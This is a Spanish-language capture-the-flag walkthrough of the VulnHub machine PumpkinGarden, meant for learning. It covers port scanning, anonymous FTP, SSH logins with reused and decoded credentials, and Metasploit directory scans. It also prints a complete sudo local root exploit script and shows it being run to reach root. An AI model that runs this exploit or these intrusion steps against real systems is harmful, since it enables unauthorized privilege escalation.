Mission Pumpkin V1 PumpkinGarden
Apuntes incompletos
Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinGarden is Level 1 of series of 3 machines under Mission-Pumpkin v1.0. The end goal of this CTF is to gain access to PumpkinGarden_key file stored in the root account.
1) Me descargo la maquina de https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkingarden,321/
2) Importo la maquina en virtualbox.
Nota: Si no puedes importar bien la maquina. renombra .ova
por .ova.tar
y extrae el disco duro csec-disk001.vmdk
Crea una maquina virtual nueba tipo Linux Ubuntu 64 y asignale el disco extraido.
3) Arranco la maquina a auditar en virtualbox
Nota2: le configuro la red como adaptador solo anfitrion.
La red de mis VM es 192.168.56.XX
(este dato puede ser diferente en tu equipo (ip a |grep global
))
Luego hago un nmap -sn 192.168.56.0/24
o nmap -sn 192.168.56.*
a ver que sale:
- #### Enumeracion La ip de la maquina es la 192.168.56.103 Enumero Puertos:
em50l@jejo.es$ nmap -F -Pn 192.168.56.103 Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-20 20:08 CEST Nmap scan report for 192.168.56.103 Host is up (0.00037s latency). Not shown: 99 closed ports PORT STATE SERVICE 21/tcp open ftp Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Solo ftp??? Saco mas detalles…
em50l@jejo.es$ nmap 192.168.56.103 -sC -p 21 Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-20 20:15 CEST Nmap scan report for 192.168.56.103 Host is up (0.00048s latency). PORT STATE SERVICE 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.56.1 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.2 - secure, fast, stable |_End of status Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
Es un Ftp anonimo. Luego lo puedo explorar facilmente.
Esta vez voy ha usar curl
en lugar de mc.
em50l@jejo.es$ curl ftp://192.168.56.103/ -rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt em50l@jejo.es$ curl ftp://192.168.56.103/note.txt Hello Dear! Looking for route map to PumpkinGarden? I think jack can help you find it. em50l@jejo.es$
Si Quisiera ver la comunicacion ftp al detalle puedo usar la opcion -v
.
em50l@jejo.es$ curl -v ftp://192.168.56.103/ * Trying 192.168.56.103... * TCP_NODELAY set * Connected to 192.168.56.103 (192.168.56.103) port 21 (#0) < 220 Welcome to Pumpkin's FTP service. > USER anonymous < 331 Please specify the password. > PASS ftp@example.com < 230 Login successful. > PWD < 257 "/" * Entry path is '/' > EPSV * Connect data stream passively < 229 Entering Extended Passive Mode (|||40149|). * Trying 192.168.56.103... * TCP_NODELAY set * Connecting to 192.168.56.103 (192.168.56.103) port 40149 * ftp_perform ends with SECONDARY: 0 * Connected to 192.168.56.103 (192.168.56.103) port 21 (#0) > TYPE A < 200 Switching to ASCII mode. > LIST < 150 Here comes the directory listing. * Maxdownload = -1 -rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt * Remembering we are in dir "" < 226 Directory send OK. * Connection #0 to host 192.168.56.103 left intact
Segun Lo de Arriba un usuario parece ser jack
.
- Ataque diccionario. (Parece que no funciona)
- pruebo con
mc ftp://jack:PumpkinGarden@192.168.56.103/
(Potra???) Creo que hay hay que elaborar un diccionario con los archivos extraidos del ftp.
Izquierdo Archivo Utilidades Opciones Derecho ┌<─ ftp://jack@192.168.56.103/ ─.[^]>┐┌─────────────── Información ─────────────┐ │.n Nombre │Tamaño │fecha Modifi││ Midnight Commander 4.8.19 │ │/.. │DIR-ANT│20 jul 20:05│├─────────────────────────────────────────┤ │/bin │ 4096│11 jun 17:55││ Archivo: home │ │/boot │ 4096│11 jun 17:56││ Ubicado: 0h:23h │ │/dev │ 4040│20 jul 14:51││ Modo: drwxr-xr-x (0755) │ │/etc │ 4096│20 jul 14:51││ Nº enlaces: 1 │ │/home │ 4096│11 jun 18:25││ Dueño: root/root │ │/lib │ 4096│11 jun 17:55││ Tamaño: 4096 (8 bloques) │ │/lib64 │ 4096│11 jun 17:51││ Cambiado: 11 jun 18:25 │ │/lost+found │ 16384│11 jun 17:43││ Modificado: 11 jun 18:25 │ │/media │ 4096│11 jun 17:43││ Accedido: 11 jun 18:25 │ │/mnt │ 4096│11 abr 2014││ Sistema en /home │ │/opt │ 4096│11 jun 17:46││ Origen: /dev/sda2 │ │/proc │ 0│20 jul 14:51││ Tipo: ext4 (802h) │ ├────────────────────────────────────┤│ Espacio libre: 148G/190G (77%) │ │/home ││ Inodos libres: 12652894/12730368 (99%) │ └────────────────────────────────────┘└─────────────────────────────────────────┘ Consejo: Con Alt-! puede ejecutar programas y ver la salida en el visor. em50l@jejo.es$ [^] 1Ayuda 2Menú 3Ver 4Editar 5Copiar 6RenMov 7Mkdir 8Borrar 9Menú 10Salir
Veo que en home hay los siguientes usuarios: goblin
jack
scarecrow
y dentro de la carpeta jack hay una nota:
Are you here for keys to pumpkin garden?
I'm afraid that scarecrow has just stolen the keys from me...
Dias mas tarde ;)
Creo que hay que escanear mas puertos.
em50l@jejo.es:~$ nmap -p1-65534 -n -A 192.168.56.103 Starting Nmap 7.60 ( https://nmap.org ) at 2019-08-01 02:06 CEST Nmap scan report for 192.168.56.103 Host is up (0.0083s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.56.1 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.2 - secure, fast, stable |_End of status 1515/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Mission-Pumpkin 3535/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA) | 2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA) | 256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA) |_ 256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (EdDSA) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.65 seconds
Veo que hay un Apache en el puerto 1515
Y un SSH en el puerto 3535
Pruebo ssh con el usuario y la contraseña del ftp (reutilizacion de contraseñas)
em50l@jejo.es$ sshpass -p 'PumpkinGarden' ssh jack@192.168.56.101 -p 3535 Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts. ------------------------------------------------------------------------------ Welcome to Mission-Pumpkin All remote connections to this machine are monitored and recorded ------------------------------------------------------------------------------ Last login: Sun Aug 25 18:20:43 2019 from 192.168.56.1 jack@Pumpkin:~$ # !!!Consegido Acceso modo usuario!!! Continuaremos en la seccion Escalada de privilegios
Ahora necesitaria una escalada de privilegios.
Accedo via ssh al arbol de archivos a ver que veo.
em50l@jejo.es$ mc sh://jack@192.168.56.101:3535 No protocol specified fish: Esperando línea de inicio... jack@192.168.56.101's password:
Enumeracion http
msf5 > use auxiliary/scanner/http/dir_scanner msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.56.101 msf5 auxiliary(scanner/http/dir_scanner) > set rport 1515 msf5 auxiliary(scanner/http/dir_scanner) > run [*] Detecting error code [*] Using code '404' as not found for 192.168.56.101 [+] Found http://192.168.56.101:1515/icons/ 403 (192.168.56.101) [+] Found http://192.168.56.101:1515/img/ 200 (192.168.56.101) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Bien he encontrado icons e img
Lo intento de otra forma
msf5 > use auxiliary/scanner/http/brute_dirs msf5 auxiliary(scanner/http/brute_dirs) > set rhosts 192.168.56.101 msf5 auxiliary(scanner/http/brute_dirs) > set rport 1515 msf5 auxiliary(scanner/http/brute_dirs) > run [*] Using code '404' as not found. [+] Found http://192.168.56.101:1515/img/ 200 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
dir_listing sin resultados
msf5 > use auxiliary/scanner/http/dir_listing msf5 auxiliary(scanner/http/dir_listing) > set rport 1515 msf5 auxiliary(scanner/http/dir_listing) > set rhosts 192.168.56.101 msf5 auxiliary(scanner/http/dir_listing) > run [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
msf5 > use auxiliary/scanner/http/files_dir msf5 auxiliary(scanner/http/files_dir) > set rhosts 192.168.56.101 msf5 auxiliary(scanner/http/files_dir) > set rport 1515 msf5 auxiliary(scanner/http/files_dir) > run [*] Using code '404' as not found for files with extension .bak [*] Using code '404' as not found for files with extension .exe [*] Using code '404' as not found for files with extension .html [+] Found http://192.168.56.101:1515/index.html 200 ... [*] Using code '404' as not found for files with extension [+] Found http://192.168.56.101:1515/img 301 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Cacharreando encuentro:
em50l@jejo.es$ curl http://192.168.56.101:1515/img/hidden_secret/clue.txt c2NhcmVjcm93IDogNVFuQCR5
base64???
em50l@jejo.es$ curl http://192.168.56.101:1515/img/hidden_secret/clue.txt |base64 --decode scarecrow : 5Qn@$y
Parece un usuario y contraseña.
em50l@jejo.es$ sshpass -p '5Qn@$y' ssh scarecrow@192.168.56.101 -p 3535 Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts. ------------------------------------------------------------------------------ Welcome to Mission-Pumpkin All remote connections to this machine are monitored and recorded ------------------------------------------------------------------------------ Last login: Thu Jun 13 00:35:51 2019 from 192.168.1.106 scarecrow@Pumpkin:~$ # !!!Consegido Acceso modo usuario!!! Continuaremos en la seccion Escalada de privilegios
scarecrow@Pumpkin:~$ ls note.txt scarecrow@Pumpkin:~$ cat note.txt Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)! Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.
sshpass -p 'Y0n$M4sy3D1t' ssh goblin@192.168.56.101 -p 3535
em50l@jejo.es$ sshpass -p 'Y0n$M4sy3D1t' ssh goblin@192.168.56.101 -p 3535 Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts. ------------------------------------------------------------------------------ Welcome to Mission-Pumpkin All remote connections to this machine are monitored and recorded ------------------------------------------------------------------------------ Last login: Thu Jun 13 00:43:14 2019 from 192.168.1.106 goblin@Pumpkin:~$ ls note goblin@Pumpkin:~$ cat note Hello Friend! I heard that you are looking for PumpkinGarden key. But Key to the garden will be with LordPumpkin(ROOT user), don't worry, I know where LordPumpkin had placed the Key. You can reach there through my backyard. Here is the key to my backyard https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh goblin@Pumpkin:~$
El codigo del exploit que indican es este:
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1
goblin@Pumpkin:~$ cat > sudoedit << _EOF > #!/bin/sh > echo ALEX-ALEX > su > /bin/su > /usr/bin/su > _EOF goblin@Pumpkin:~$ chmod a+x ./sudoedit goblin@Pumpkin:~$ sudo ./sudoedit $1 [sudo] password for goblin: Sorry, try again. [sudo] password for goblin: ALEX-ALEX root@Pumpkin:/home/goblin# cd root@Pumpkin:~# cat PumpkinGarden_Key Q29uZ3JhdHVsYXRpb25zIQ==